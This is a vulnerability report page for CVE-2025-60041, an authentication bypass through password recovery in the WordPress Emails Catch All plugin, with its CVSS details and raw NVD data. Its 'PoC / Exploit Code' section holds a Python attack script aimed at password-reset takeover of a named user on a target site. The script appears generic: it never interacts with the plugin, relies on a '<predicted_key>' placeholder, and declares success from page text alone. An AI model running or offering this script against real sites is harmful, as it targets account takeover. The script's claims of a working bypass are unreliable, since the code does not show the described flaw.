Security Vulnerability Report
中文
CVE-2025-60041 CVSS 8.8 HIGH

CVE-2025-60041

Published: 2025-10-22 15:15:57
Last Modified: 2026-04-27 16:16:29

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in Iulia Cazan Emails Catch All emails-catch-all allows Password Recovery Exploitation.This issue affects Emails Catch All: from n/a through <= 3.5.3.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress Emails Catch All Plugin <= 3.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-60041 PoC - Authentication Bypass in Emails Catch All Plugin # Target: WordPress site with Emails Catch All plugin <= 3.5.3 def exploit_auth_bypass(target_url, username): """ Exploit authentication bypass via password recovery mechanism """ # Step 1: Identify password reset endpoint wp_login = f"{target_url}/wp-login.php" # Step 2: Trigger password reset for target user reset_url = f"{target_url}/wp-login.php?action=lostpassword" payload = { 'user_login': username, 'redirect_to': '' } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting user: {username}") # Step 3: Send password reset request try: response = requests.post(reset_url, data=payload, timeout=10) if 'resetpass' in response.text or response.status_code == 200: print("[+] Password reset link generated successfully") print("[*] Check email for reset link or exploit token prediction") # Step 4: Alternative path exploitation # Attempt to bypass validation bypass_url = f"{target_url}/wp-login.php?action=rp&key=<predicted_key>&login={username}" bypass_response = requests.get(bypass_url, timeout=10) if 'Set a new password' in bypass_response.text: print("[+] Authentication bypass successful - Password reset page accessible") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <username>") print(f"Example: python {sys.argv[0]} http://example.com admin") sys.exit(1) target = sys.argv[1] user = sys.argv[2] exploit_auth_bypass(target, user)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60041", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:56.660", "lastModified": "2026-04-27T16:16:29.197", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Iulia Cazan Emails Catch All emails-catch-all allows Password Recovery Exploitation.This issue affects Emails Catch All: from n/a through <= 3.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/emails-catch-all/vulnerability/wordpress-emails-catch-all-plugin-3-5-3-broken-authentication-vulnerability?_s_id=cve", "source": "[email protected]"}]}}